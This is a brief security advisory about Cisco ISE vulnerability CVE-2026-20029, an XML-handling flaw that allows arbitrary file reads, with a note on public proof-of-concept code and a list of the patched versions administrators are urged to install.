15/69 Friday, January 9, 2026
Cisco has released a security update to address CVE-2026-20029 affecting Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC), which are used for network access control and identity management. The vulnerability is caused by improper handling of XML input processing in the Web Management Interface, allowing an attacker with administrator privileges to read arbitrary files on the underlying operating system. This includes sensitive files that should not normally be accessible even to administrative users.
The risk is heightened by the public release of proof-of-concept (PoC) exploit code, increasing the likelihood that attackers could weaponize the flaw. Although Cisco’s Product Security Incident Response Team (PSIRT) has stated that no active exploitation has been observed at this time, Cisco ISE has historically been a high-value target for attackers. For example, CVE-2025-20337 was previously exploited to deploy malware. As a result, the availability of exploit code should be considered a serious warning sign requiring immediate action.
To mitigate the risk, Cisco strongly recommends that administrators upgrade to the patched versions as soon as possible:
- ISE / ISE-PIC 3.2 Patch 8
- ISE / ISE-PIC 3.3 Patch 8
- ISE / ISE-PIC 3.4 Patch 4
(Newer versions are also unaffected, and version 3.5 is not impacted.)
Cisco emphasized that temporary mitigation measures are not a substitute for permanent fixes, and urges organizations to apply the updates promptly to close the vulnerability and reduce the risk of future attacks.
